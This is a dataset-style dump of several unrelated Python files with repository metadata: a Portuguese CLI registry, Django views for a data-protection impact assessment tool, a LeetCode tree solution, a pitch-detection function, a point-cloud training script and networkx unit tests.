print('\033[34m1\033[m - \033[35mCadastrar nova pessoa\033[m')
print('\033[34m2\033[m - \033[35mVer pessoas cadastradas\033[m')
print('\033[34m3\033[m - \033[35mSair do Sistema\033[m')
print('\033[33m=\033[m' * 60)
def escolha():
while True:
try:
escolha = int(input('Sua escolha: '))
while escolha > 3 or escolha < 1:
print('\033[31mValor digitado não condiz com a tabela\033[m')
escolha = int(input('Sua escolha: '))
if escolha > 3 and escolha < 1:
break
except:
print('\033[31mValor digitado não condiz com a tabela\033[m')
else:
break
return escolha
def arquivoExiste(nome):
try:
arquivo = open(nome, 'rt')
arquivo.close()
except (FileNotFoundError):
return False
else:
return True
def criarArquivo(nome):
try:
arquivo = open(nome, 'wt+')
arquivo.close()
except:
print('Houve algum erro')
def opcao1(arquivo) :
print('\033[33m-' * 60)
print('CADASTRAR PESSOA'.center(50))
print('\033[33m-\033[m' * 60)
nome = input('Digite o nome: ')
idade = int(input('Digite a idade: '))
try:
arquivo = open(arquivo, 'at')
except:
print('Arquivo não conseguiu ser aberto')
else:
try:
arquivo.write(f'{nome};{idade}\n')
except:
print('Não consegui computar')
else:
print('Pessoa cadastrada com sucesso!')
arquivo.close()
def opcao2(nome):
print('\033[33m-' * 60)
print('LISTA DE PESSOAS'.center(50))
print('\033[33m-\033[m' * 60)
try:
arquivo = open(nome, 'rt')
except:
print('Arquivo não conseguiu ser aberto')
else:
print('...')
print(f'Nome Idade')
print('-' * 60)
for linha in arquivo:
dado = linha.split(';')
dado[1] = dado[1].replace('\n', '')
print(f'{dado[0]:<30}{dado[1]:>3} anos')
arquivo.close()
| 28.61039
| 77
| 0.523831
| 264
| 2,203
| 4.371212
| 0.329545
| 0.076257
| 0.057192
| 0.033795
| 0.361352
| 0.214038
| 0.199307
| 0.199307
| 0.081456
| 0.081456
| 0
| 0.094758
| 0.324557
| 2,203
| 77
| 78
| 28.61039
| 0.68078
| 0
| 0
| 0.478873
| 0
| 0
| 0.30127
| 0.011343
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084507
| false
| 0
| 0
| 0
| 0.126761
| 0.338028
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31eefe99531de5ae9af50c89852e0a1767f078c7
| 12,523
|
py
|
Python
|
dpia/views/threats.py
|
ait-csr/dpia-tool
|
458f106e25b1d3bd2f07fd9df18bde880f4edc4a
|
[
"MIT"
] | 4
|
2018-12-25T05:53:17.000Z
|
2022-02-07T10:07:06.000Z
|
dpia/views/threats.py
|
ait-csr/dpia-tool
|
458f106e25b1d3bd2f07fd9df18bde880f4edc4a
|
[
"MIT"
] | 9
|
2020-02-12T00:57:33.000Z
|
2022-03-11T23:24:13.000Z
|
dpia/views/threats.py
|
CSR-AIT/dpia-tool
|
458f106e25b1d3bd2f07fd9df18bde880f4edc4a
|
[
"MIT"
] | null | null | null |
from dpia.modules import *
# @primary_assets_required
# @supporting_assets_required
@login_required
def threat_identification(request, q_id=None):
'''
Shows a list of the added supporting assets which are assigned to a primary asset.
The user here selects threats from the list of generic threats or adds a new threat to a supporting asset.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
# query supporting assets
supporting_assets = Supporting.objects.filter(supporting_in_psrel__primary__questionaire=q).distinct()
args = {}
args.update(csrf(request))
args['q'] = q
args['supporting_assets'] = supporting_assets
return render(request, "threats/threat_identification.html", args)
# supporting-asset add
@login_required
def threat_sa_rel_add(request, sa_id=None):
'''
Adds generic threats to a supporting asset.
'''
user = request.user
supporting_object = get_object_or_404(Supporting, id=sa_id)
if supporting_object:
pa_sa_rel = PrimarySupportingRel.objects.filter(supporting=supporting_object)[0] # [0]: to select only one object when there are duplicates
primary_id = pa_sa_rel.primary_id
primary = get_object_or_404(Primary, id=primary_id)
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=primary.questionaire_id)
data = dict()
## Add Threats to a SA
if request.POST and request.is_ajax():
if 'threat' in request.POST:
with reversion.create_revision():
checked_threats = request.POST.getlist('threat')
threat_list = []
for checked_threat in checked_threats:
threat_object = get_object_or_404(Threat, id=checked_threat)
# create a new relationship with the above objects, no duplicates
rel, created = Threat_SA_REL.objects.get_or_create(affected_supporting_asset=supporting_object, threat=threat_object)
threat_list.append(threat_object.name)
comment = ", ".join(threat_list)
# Store some meta-information.
save_revision_meta(user, q, 'Added generic threats "%s" to supporting asset "%s".' %(comment, supporting_object))
## ajax data
django_messages = []
messages.success(request, u'Generic threats were added successfully to supporting asset "%s".' %(supporting_object))
for message in messages.get_messages(request):
django_messages.append({
"level": message.level,
"message": message.message,
"extra_tags": message.tags,
})
data['messages'] = django_messages
data['form_is_valid'] = True
# query supporting assets
supporting_assets = Supporting.objects.filter(supporting_in_psrel__primary__questionaire=q).distinct()
args = {}
args['q'] = q
args['supporting_assets'] = supporting_assets
data['html_q_list'] = render_to_string('threats/partial_threats_list.html', args)
else:
data['form_is_valid'] = False
# query generic_threats and each newly created Threat per questionnaire
generic_threats = Threat.objects.all() #.exclude(~Q(threat_sa_rel__affected_supporting_asset__primary__questionaire=q), threat_sa_rel__affected_supporting_asset__primary__questionaire__isnull=False).order_by("type_of_jeopardy")
# # query threats the user selects // of the instant questionaire
# selected_threats = Threat_SA_REL.objects.prefetch_related().all().filter(affected_supporting_asset__primary__questionaire=q).distinct()
args = {}
args.update(csrf(request))
args['q'] = q
args['supporting_object'] = supporting_object
args['generic_threats'] = generic_threats
args['primary'] = primary
data['html_form'] = render_to_string('threats/threat_sa_rel_add.html', args, request=request)
return JsonResponse(data)
@login_required
def threat_add(request, q_id=None, sa_id=None):
'''
Adds new threats (defined by the user) to a supporting asset.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
sa = get_object_or_404(Supporting, id=sa_id)
data = dict()
## Add Threat
threat_form = ThreatForm(request.POST or None)
if request.POST and request.is_ajax():
if threat_form.is_valid():
with reversion.create_revision():
threat = threat_form.save(commit=False)
threat.supporting_asset_type = sa.supporting_type
threat.save()
new_threat_sa_rel = Threat_SA_REL.objects.get_or_create(affected_supporting_asset=sa, threat=threat)
# Store some meta-information.
save_revision_meta(user, q, 'Added new threat "%s" to supporting asset "%s".' %(threat.name, sa))
## ajax data
django_messages = []
messages.success(request, u'New threat "%s" was added successfully to supporting asset "%s".' %(threat.name, sa))
for message in messages.get_messages(request):
django_messages.append({
"level": message.level,
"message": message.message,
"extra_tags": message.tags,
})
data['messages'] = django_messages
data['form_is_valid'] = True
# query supporting assets
supporting_assets = Supporting.objects.filter(supporting_in_psrel__primary__questionaire=q).distinct()
args = {}
args['q'] = q
args['supporting_assets'] = supporting_assets
data['html_q_list'] = render_to_string('threats/partial_threats_list.html', args)
else:
data['form_is_valid'] = False
args = {}
args.update(csrf(request))
args['q'] = q
args['sa'] = sa
args['threat_form'] = threat_form
data['html_form'] = render_to_string('threats/threat_add.html', args, request=request)
return JsonResponse(data)
@login_required
def threat_rel_delete(request, q_id=None, threat_id=None):
'''
Delete a relationship between threat and supporting asset.
It doesn't delete the threat completely; it simply removes it from the supporting asset it is assigned to.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
threat_rel = get_object_or_404(Threat_SA_REL, id=threat_id)
data = dict()
if request.POST and request.is_ajax():
threat_rel.delete()
## ajax data
django_messages = []
messages.success(request, u'Threat "%s" was removed successfully from supporting asset "%s".' %(threat_rel.threat, threat_rel.affected_supporting_asset))
for message in messages.get_messages(request):
django_messages.append({
"level": message.level,
"message": message.message,
"extra_tags": message.tags,
})
data['form_is_valid'] = True
data['messages'] = django_messages
# query threats the user has selected and order by the MaxValue of the Sum
selected_threats = Threat_SA_REL.objects.filter(affected_supporting_asset__questionaire=q)
# query supporting assets
supporting_assets = Supporting.objects.filter(supporting_in_psrel__primary__questionaire=q).distinct()
args = {}
args['q'] = q
args['supporting_assets'] = supporting_assets
data['html_q_list'] = render_to_string('threats/partial_threats_list.html', args)
else:
args = {}
args.update(csrf(request))
args['q'] = q
args['threat_rel'] = threat_rel
data['html_form'] = render_to_string('threats/threat_rel_remove.html', args, request=request)
return JsonResponse(data)
# @supporting_assets_required
# @threats_required
@login_required
def threat_assessment(request, q_id=None):
'''
Shows a formset table of all the threats (ordered by their "likelihood" value) selected by the user in the step "Threat Identification".
It accepts two values, namely "level of vulnerability" and "risk source capability".
If either of them is entered above the max number value (4) or not entered at all, an error is raised.
The likelihood value is automatically calculated as the sum of the level of vulnerability and risk source capability.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
# query threats the user has selected and order by the MaxValue of the Sum;
# and filter only those that have a relationship to a primary asset. the "is_null" filtering is done in case the user goes back to
# the primary list step to remove supporting assets.
selected_threats = q.get_threats()
## Selected threats formset
ThreatFormset = modelformset_factory(Threat_SA_REL, form=Threat_SA_REL_Form, extra=0)
threat_formset = ThreatFormset(queryset=selected_threats)
if request.POST:
if selected_threats.exists():
threat_formset = ThreatFormset(request.POST, request.FILES)
if threat_formset.is_valid():
with reversion.create_revision():
for form in threat_formset.forms:
threat = form.save(commit=False)
threat.likelihood = threat.level_of_vulnerability + threat.risk_source_capability
threat.save()
threat_formset.save()
threat_list = selected_threats.values_list('threat__name', flat=True)
comment = ", ".join(threat_list)
# Store some meta-information.
save_revision_meta(user, q, 'Assessed likelihood of threats "{}".'.format(comment))
messages.success(request, u'Likelihood of threats was assessed successfully.')
return redirect(reverse('risk_assessment', args=[q.id]))
else:
messages.error(request, u'Please fill out the required fields.')
else:
return redirect('risk_assessment', q.id)
args = {}
args.update(csrf(request))
args['q'] = q
args['selected_threats'] = selected_threats
args['threat_formset'] = threat_formset
return render(request, "threats/threat_assessment.html", args)
# @supporting_assets_required
# @threats_required
# @threat_assessment_required
# @risk_assessment_required
@login_required
def threat_controls(request, q_id=None):
'''
Shows a formset list of all the assessed threats.
The user is required to fill out only the controls field.
'''
user = request.user
q = get_object_or_404(Questionaire, q_in_membership__member=user, id=q_id)
## query Threats
threats = q.get_threats()
ThreatFormset2 = modelformset_factory(Threat_SA_REL, form=Threat_SA_REL_Form2, extra=0)
if request.POST:
if threats.exists():
threat_formset = ThreatFormset2(request.POST, queryset=threats)
for form in threat_formset.forms:
form.fields['control'].required = True
with reversion.create_revision():
if threat_formset.is_valid():
threat_formset.save()
# Store some meta-information.
threat_list = threats.values_list('threat__name', flat=True)
comment = ", ".join(threat_list)
save_revision_meta(user, q, 'Implemented controls to threats "{}".'.format(comment))
messages.success(request, u'Controls were implemented successfully.')
return redirect(reverse('risk_mitigation', args=[q.id]))
else:
messages.error(request, u'Please fill out the required fields.')
else:
return redirect('risk_mitigation', q.id)
else:
threat_formset = ThreatFormset2(queryset=threats)
args = {}
args.update(csrf(request))
args['q'] = q
args['threat_formset'] = threat_formset
return render(request, "threats/threat_controls.html", args)
| 45.046763
| 231
| 0.649844
| 1,497
| 12,523
| 5.185705
| 0.137609
| 0.043282
| 0.019838
| 0.019838
| 0.600541
| 0.54296
| 0.498519
| 0.448023
| 0.404998
| 0.360943
| 0
| 0.004521
| 0.258245
| 12,523
| 277
| 232
| 45.209386
| 0.831198
| 0.19556
| 0
| 0.626316
| 0
| 0
| 0.131579
| 0.027627
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031579
| false
| 0
| 0.005263
| 0
| 0.089474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31efc2692f61977bbe23784db9dd5034a2c6c959
| 1,153
|
py
|
Python
|
Week 2/id_165/LeetCode_105_165.py
|
larryRishi/algorithm004-05
|
e60d0b1176acd32a9184b215e36d4122ba0b6263
|
[
"Apache-2.0"
] | 1
|
2019-10-12T06:48:45.000Z
|
2019-10-12T06:48:45.000Z
|
Week 2/id_165/LeetCode_105_165.py
|
larryRishi/algorithm004-05
|
e60d0b1176acd32a9184b215e36d4122ba0b6263
|
[
"Apache-2.0"
] | 1
|
2019-12-01T10:02:03.000Z
|
2019-12-01T10:02:03.000Z
|
Week 2/id_165/LeetCode_105_165.py
|
larryRishi/algorithm004-05
|
e60d0b1176acd32a9184b215e36d4122ba0b6263
|
[
"Apache-2.0"
] | null | null | null |
# 根据一棵树的前序遍历与中序遍历构造二叉树。
#
# 注意:
# 你可以假设树中没有重复的元素。
#
# 例如,给出
#
# 前序遍历 preorder = [3,9,20,15,7]
# 中序遍历 inorder = [9,3,15,20,7]
#
# 返回如下的二叉树:
#
# 3
# / \
# 9 20
# / \
# 15 7
# Related Topics 树 深度优先搜索 数组
# leetcode submit region begin(Prohibit modification and deletion)
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def buildTreeNode(self, preorder, inorder):
if not preorder:
return None
root = preorder[0]
node = TreeNode(root)
partition = inorder.index(root)
node.left = self.buildTreeNode(preorder[1:partition + 1], inorder[0:partition])
node.right = self.buildTreeNode(preorder[partition + 1:], inorder[partition + 1:])
return node
def buildTree(self, preorder, inorder):
"""
:type preorder: List[int]
:type inorder: List[int]
:rtype: TreeNode
"""
return self.buildTreeNode(preorder, inorder)
# leetcode submit region end(Prohibit modification and deletion)
| 19.542373
| 90
| 0.608846
| 134
| 1,153
| 5.208955
| 0.455224
| 0.06447
| 0.10745
| 0.017192
| 0.020057
| 0
| 0
| 0
| 0
| 0
| 0
| 0.032335
| 0.275802
| 1,153
| 58
| 91
| 19.87931
| 0.803593
| 0.356461
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0
| 0
| 0.470588
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31f50a275cce9e7222985c09de6a704fd2d856df
| 1,575
|
py
|
Python
|
pyACA/PitchTimeAmdf.py
|
ruohoruotsi/pyACA
|
339e9395b65a217aa5965638af941b32d5c95454
|
[
"MIT"
] | null | null | null |
pyACA/PitchTimeAmdf.py
|
ruohoruotsi/pyACA
|
339e9395b65a217aa5965638af941b32d5c95454
|
[
"MIT"
] | null | null | null |
pyACA/PitchTimeAmdf.py
|
ruohoruotsi/pyACA
|
339e9395b65a217aa5965638af941b32d5c95454
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
computes the lag of the amdf function
Args:
x: audio signal
iBlockLength: block length in samples
iHopLength: hop length in samples
f_s: sample rate of audio data (unused)
Returns:
f frequency
t time stamp for the frequency value
"""
import numpy as np
import math
def PitchTimeAmdf(x, iBlockLength, iHopLength, f_s):
# initialize
f_max = 2000
f_min = 50
iNumOfBlocks = math.ceil(x.size / iHopLength)
# compute time stamps
t = (np.arange(0, iNumOfBlocks) * iHopLength + (iBlockLength / 2)) / f_s
# allocate memory
f = np.zeros(iNumOfBlocks)
eta_min = int(round(f_s / f_max)) - 1
eta_max = int(round(f_s / f_min)) - 1
for n in range(0, iNumOfBlocks):
i_start = n * iHopLength
i_stop = np.min([x.size - 1, i_start + iBlockLength - 1])
# calculate the acf
if not x[np.arange(i_start, i_stop + 1)].sum():
continue
else:
x_tmp = x[np.arange(i_start, i_stop + 1)]
afCorr = computeAmdf(x_tmp, eta_max)
# find the coefficients specified in eta
f[n] = np.argmin(afCorr[np.arange(eta_min + 1, afCorr.size)]) + 1
# convert to Hz
f[n] = f_s / (f[n] + eta_min + 1)
return (f, t)
def computeAmdf(x, eta_max):
K = x.shape[0]
if K <= 0:
return 0
afAmdf = np.ones(K)
for eta in range(0, np.min([K, eta_max + 1])):
afAmdf[eta] = np.sum(np.abs(x[np.arange(0, K - 1 - eta)] - x[np.arange(eta + 1, K)])) / K
return (afAmdf)
| 23.161765
| 97
| 0.581587
| 243
| 1,575
| 3.662551
| 0.36214
| 0.013483
| 0.040449
| 0.022472
| 0.07191
| 0.047191
| 0.047191
| 0.047191
| 0
| 0
| 0
| 0.024259
| 0.293333
| 1,575
| 67
| 98
| 23.507463
| 0.775382
| 0.256508
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.068966
| 0
| 0.241379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31f5cac689f164c99d0da2f1eb8dc6d483e34f4e
| 6,878
|
py
|
Python
|
trainfile/mfeam_shapenet-spix-disc.py
|
aabbcco/ssn-3d-pytorch
|
3b5a1bb807ce751b03501772ed9da48ac7f9f30b
|
[
"MIT"
] | null | null | null |
trainfile/mfeam_shapenet-spix-disc.py
|
aabbcco/ssn-3d-pytorch
|
3b5a1bb807ce751b03501772ed9da48ac7f9f30b
|
[
"MIT"
] | null | null | null |
trainfile/mfeam_shapenet-spix-disc.py
|
aabbcco/ssn-3d-pytorch
|
3b5a1bb807ce751b03501772ed9da48ac7f9f30b
|
[
"MIT"
] | null | null | null |
import os
import math
import numpy as np
import time
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from tensorboardX import SummaryWriter
import sys
sys.path.append(os.path.dirname("../"))
from lib.utils.meter import Meter
from models.model_MNFEAM import MFEAM_SSN
from lib.dataset.shapenet import shapenet_spix
from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse, uniform_compact_loss
from lib.MEFEAM.MEFEAM import discriminative_loss
@torch.no_grad()
def eval(model, loader, pos_scale, device):
def achievable_segmentation_accuracy(superpixel, label):
"""
Function to calculate Achievable Segmentation Accuracy:
ASA(S,G) = sum_j max_i |s_j \cap g_i| / sum_i |g_i|
Args:
input: superpixel image (H, W),
output: ground-truth (H, W)
"""
TP = 0
unique_id = np.unique(superpixel)
for uid in unique_id:
mask = superpixel == uid
label_hist = np.histogram(label[mask])
maximum_regionsize = label_hist[0].max()
TP += maximum_regionsize
return TP / label.size
model.eval() # change the mode of model to eval
sum_asa = 0
for data in loader:
inputs, labels = data # b*c*npoint
inputs = inputs.to(device) # b*c*w*h
labels = labels.to(device) # sematic_lable
inputs = pos_scale * inputs
# calculation,return affinity,hard lable,feature tensor
Q, H, feat = model(inputs)
asa = achievable_segmentation_accuracy(
H.to("cpu").detach().numpy(),
labels.to("cpu").numpy()) # return data to cpu
sum_asa += asa
model.train()
return sum_asa / len(loader) # cal asa
def update_param(data, model, optimizer, compactness, pos_scale, device,
disc_loss):
inputs, labels, _, spix = data
inputs = inputs.to(device)
labels = labels.to(device)
inputs = pos_scale * inputs
(Q, H, _, _), msf_feature = model(inputs)
recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels)
compact_loss = reconstruct_loss_with_mse(Q, inputs, H)
disc = disc_loss(msf_feature, spix)
#uniform_compactness = uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device)
loss = recons_loss + compactness * compact_loss + disc
optimizer.zero_grad() # clear previous grad
loss.backward() # cal the grad
optimizer.step() # backprop
return {
"loss": loss.item(),
"reconstruction": recons_loss.item(),
"compact": compact_loss.item(),
"disc": disc.item()
}
def train(cfg):
if torch.cuda.is_available():
device = "cuda"
else:
device = "cpu"
model = MFEAM_SSN(10, 50).to(device)
disc_loss = discriminative_loss(0.1, 0.5)
optimizer = optim.Adam(model.parameters(), cfg.lr)
train_dataset = shapenet_spix(cfg.root)
train_loader = DataLoader(train_dataset,
cfg.batchsize,
shuffle=True,
drop_last=True,
num_workers=cfg.nworkers)
# test_dataset = shapenet.shapenet(cfg.root, split="test")
# test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False)
meter = Meter()
iterations = 0
max_val_asa = 0
writer = SummaryWriter(log_dir='log', comment='traininglog')
while iterations < cfg.train_iter:
for data in train_loader:
iterations += 1
metric = update_param(data, model, optimizer, cfg.compactness,
cfg.pos_scale, device, disc_loss)
meter.add(metric)
state = meter.state(f"[{iterations}/{cfg.train_iter}]")
print(state)
# return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item()}
writer.add_scalar("comprehensive/loss", metric["loss"], iterations)
writer.add_scalar("loss/reconstruction_loss",
metric["reconstruction"], iterations)
writer.add_scalar("loss/compact_loss", metric["compact"],
iterations)
writer.add_scalar("loss/disc_loss", metric["disc"], iterations)
if (iterations % 1000) == 0:
torch.save(
model.state_dict(),
os.path.join(cfg.out_dir,
"model_iter" + str(iterations) + ".pth"))
# if (iterations % cfg.test_interval) == 0:
# asa = eval(model, test_loader, cfg.pos_scale, device)
# print(f"validation asa {asa}")
# writer.add_scalar("comprehensive/asa", asa, iterations)
# if asa > max_val_asa:
# max_val_asa = asa
# torch.save(model.state_dict(), os.path.join(
# cfg.out_dir, "bset_model_sp_loss.pth"))
if iterations == cfg.train_iter:
break
unique_id = str(int(time.time()))
torch.save(model.state_dict(),
os.path.join(cfg.out_dir, "model" + unique_id + ".pth"))
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--root",
type=str,
default='../shapenet_partseg_spix',
help="/ path/to/shapenet")
parser.add_argument("--out_dir",
default="./log",
type=str,
help="/path/to/output directory")
parser.add_argument("--batchsize", default=8, type=int)
parser.add_argument("--nworkers",
default=8,
type=int,
help="number of threads for CPU parallel")
parser.add_argument("--lr", default=1e-6, type=float, help="learning rate")
parser.add_argument("--train_iter", default=10000, type=int)
parser.add_argument("--fdim",
default=10,
type=int,
help="embedding dimension")
parser.add_argument("--niter",
default=5,
type=int,
help="number of iterations for differentiable SLIC")
parser.add_argument("--nspix",
default=50,
type=int,
help="number of superpixels")
parser.add_argument("--pos_scale", default=10, type=float)
parser.add_argument("--compactness", default=1e-4, type=float)
parser.add_argument("--test_interval", default=100, type=int)
args = parser.parse_args()
os.makedirs(args.out_dir, exist_ok=True)
train(args)
| 35.453608
| 112
| 0.577639
| 787
| 6,878
| 4.864041
| 0.27446
| 0.028213
| 0.053292
| 0.017241
| 0.177638
| 0.071055
| 0.071055
| 0.071055
| 0.071055
| 0.071055
| 0
| 0.009263
| 0.309392
| 6,878
| 193
| 113
| 35.637306
| 0.796632
| 0.153969
| 0
| 0.086957
| 0
| 0
| 0.093521
| 0.013758
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.108696
| 0
| 0.15942
| 0.007246
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31f62416b0ccc5186e179c986b3ee82c422d3de0
| 5,226
|
py
|
Python
|
venv/Lib/site-packages/networkx/algorithms/tests/test_structuralholes.py
|
amelliaaas/tugastkc4
|
f442382c72379e911f3780543b95345a3b1c9407
|
[
"Apache-2.0"
] | 10,024
|
2015-01-01T13:06:43.000Z
|
2022-03-31T12:45:25.000Z
|
venv/Lib/site-packages/networkx/algorithms/tests/test_structuralholes.py
|
amelliaaas/tugastkc4
|
f442382c72379e911f3780543b95345a3b1c9407
|
[
"Apache-2.0"
] | 3,191
|
2015-01-01T18:13:11.000Z
|
2022-03-31T22:06:00.000Z
|
venv/Lib/site-packages/networkx/algorithms/tests/test_structuralholes.py
|
amelliaaas/tugastkc4
|
f442382c72379e911f3780543b95345a3b1c9407
|
[
"Apache-2.0"
] | 3,272
|
2015-01-01T05:04:53.000Z
|
2022-03-31T17:46:35.000Z
|
"""Unit tests for the :mod:`networkx.algorithms.structuralholes` module."""
import math
import pytest
import networkx as nx
class TestStructuralHoles:
"""Unit tests for computing measures of structural holes.
The expected values for these functions were originally computed using the
proprietary software `UCINET`_ and the free software `IGraph`_ , and then
computed by hand to make sure that the results are correct.
.. _UCINET: https://sites.google.com/site/ucinetsoftware/home
.. _IGraph: http://igraph.org/
"""
def setup(self):
self.D = nx.DiGraph()
self.D.add_edges_from([(0, 1), (0, 2), (1, 0), (2, 1)])
self.D_weights = {(0, 1): 2, (0, 2): 2, (1, 0): 1, (2, 1): 1}
# Example from http://www.analytictech.com/connections/v20(1)/holes.htm
self.G = nx.Graph()
self.G.add_edges_from(
[
("A", "B"),
("A", "F"),
("A", "G"),
("A", "E"),
("E", "G"),
("F", "G"),
("B", "G"),
("B", "D"),
("D", "G"),
("G", "C"),
]
)
self.G_weights = {
("A", "B"): 2,
("A", "F"): 3,
("A", "G"): 5,
("A", "E"): 2,
("E", "G"): 8,
("F", "G"): 3,
("B", "G"): 4,
("B", "D"): 1,
("D", "G"): 3,
("G", "C"): 10,
}
def test_constraint_directed(self):
constraint = nx.constraint(self.D)
assert constraint[0] == pytest.approx(1.003, abs=1e-3)
assert constraint[1] == pytest.approx(1.003, abs=1e-3)
assert constraint[2] == pytest.approx(1.389, abs=1e-3)
def test_effective_size_directed(self):
effective_size = nx.effective_size(self.D)
assert effective_size[0] == pytest.approx(1.167, abs=1e-3)
assert effective_size[1] == pytest.approx(1.167, abs=1e-3)
assert effective_size[2] == pytest.approx(1, abs=1e-3)
def test_constraint_weighted_directed(self):
D = self.D.copy()
nx.set_edge_attributes(D, self.D_weights, "weight")
constraint = nx.constraint(D, weight="weight")
assert constraint[0] == pytest.approx(0.840, abs=1e-3)
assert constraint[1] == pytest.approx(1.143, abs=1e-3)
assert constraint[2] == pytest.approx(1.378, abs=1e-3)
def test_effective_size_weighted_directed(self):
D = self.D.copy()
nx.set_edge_attributes(D, self.D_weights, "weight")
effective_size = nx.effective_size(D, weight="weight")
assert effective_size[0] == pytest.approx(1.567, abs=1e-3)
assert effective_size[1] == pytest.approx(1.083, abs=1e-3)
assert effective_size[2] == pytest.approx(1, abs=1e-3)
def test_constraint_undirected(self):
constraint = nx.constraint(self.G)
assert constraint["G"] == pytest.approx(0.400, abs=1e-3)
assert constraint["A"] == pytest.approx(0.595, abs=1e-3)
assert constraint["C"] == pytest.approx(1, abs=1e-3)
def test_effective_size_undirected_borgatti(self):
effective_size = nx.effective_size(self.G)
assert effective_size["G"] == pytest.approx(4.67, abs=1e-2)
assert effective_size["A"] == pytest.approx(2.50, abs=1e-2)
assert effective_size["C"] == pytest.approx(1, abs=1e-2)
def test_effective_size_undirected(self):
G = self.G.copy()
nx.set_edge_attributes(G, 1, "weight")
effective_size = nx.effective_size(G, weight="weight")
assert effective_size["G"] == pytest.approx(4.67, abs=1e-2)
assert effective_size["A"] == pytest.approx(2.50, abs=1e-2)
assert effective_size["C"] == pytest.approx(1, abs=1e-2)
def test_constraint_weighted_undirected(self):
G = self.G.copy()
nx.set_edge_attributes(G, self.G_weights, "weight")
constraint = nx.constraint(G, weight="weight")
assert constraint["G"] == pytest.approx(0.299, abs=1e-3)
assert constraint["A"] == pytest.approx(0.795, abs=1e-3)
assert constraint["C"] == pytest.approx(1, abs=1e-3)
def test_effective_size_weighted_undirected(self):
G = self.G.copy()
nx.set_edge_attributes(G, self.G_weights, "weight")
effective_size = nx.effective_size(G, weight="weight")
assert effective_size["G"] == pytest.approx(5.47, abs=1e-2)
assert effective_size["A"] == pytest.approx(2.47, abs=1e-2)
assert effective_size["C"] == pytest.approx(1, abs=1e-2)
def test_constraint_isolated(self):
G = self.G.copy()
G.add_node(1)
constraint = nx.constraint(G)
assert math.isnan(constraint[1])
def test_effective_size_isolated(self):
G = self.G.copy()
G.add_node(1)
nx.set_edge_attributes(G, self.G_weights, "weight")
effective_size = nx.effective_size(G, weight="weight")
assert math.isnan(effective_size[1])
def test_effective_size_borgatti_isolated(self):
G = self.G.copy()
G.add_node(1)
effective_size = nx.effective_size(G)
assert math.isnan(effective_size[1])
| 39
| 79
| 0.580559
| 721
| 5,226
| 4.072122
| 0.165049
| 0.168256
| 0.036785
| 0.049046
| 0.729223
| 0.652248
| 0.604223
| 0.541894
| 0.533038
| 0.452997
| 0
| 0.048554
| 0.259089
| 5,226
| 133
| 80
| 39.293233
| 0.709711
| 0.095484
| 0
| 0.301887
| 0
| 0
| 0.027079
| 0
| 0
| 0
| 0
| 0
| 0.283019
| 1
| 0.122642
| false
| 0
| 0.028302
| 0
| 0.160377
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
31fb74a7001125577af1d8ec0c7f1936437a0db6
| 19,069
|
py
|
Python
|
AssetAllocation.py
|
MomsLasanga/AssetAllocation
|
3729da4f73402d9162c444636002a964f26e40eb
|
[
"CC0-1.0"
] | null | null | null |
AssetAllocation.py
|
MomsLasanga/AssetAllocation
|
3729da4f73402d9162c444636002a964f26e40eb
|
[
"CC0-1.0"
